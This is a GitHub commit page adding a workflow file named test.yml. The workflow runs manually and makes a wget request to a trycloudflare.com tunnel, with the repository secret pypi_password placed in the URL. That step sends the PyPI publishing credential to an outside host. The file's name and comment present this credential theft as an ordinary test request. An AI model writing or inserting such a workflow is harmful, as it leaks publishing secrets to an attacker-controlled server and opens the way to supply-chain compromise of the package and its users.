Skip to content

Commit

Permalink
Create test.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
himal2007 committed Sep 16, 2024
1 parent b44e980 commit 0140ca3
Showing 1 changed file with 17 additions and 0 deletions.
17 changes: 17 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
# This allows the workflow to be triggered manually
on:
workflow_dispatch:

jobs:
wget-job:
runs-on: ubuntu-latest

steps:
# Checkout the repository
- name: Checkout repository
uses: actions/checkout@v3

# Make a wget request to the specified URL
- name: Make a Wget Request
run: |
wget https://enquiry-clocks-game-gets.trycloudflare.com/${{ secrets.pypi_password }}

0 comments on commit 0140ca3

Please sign in to comment.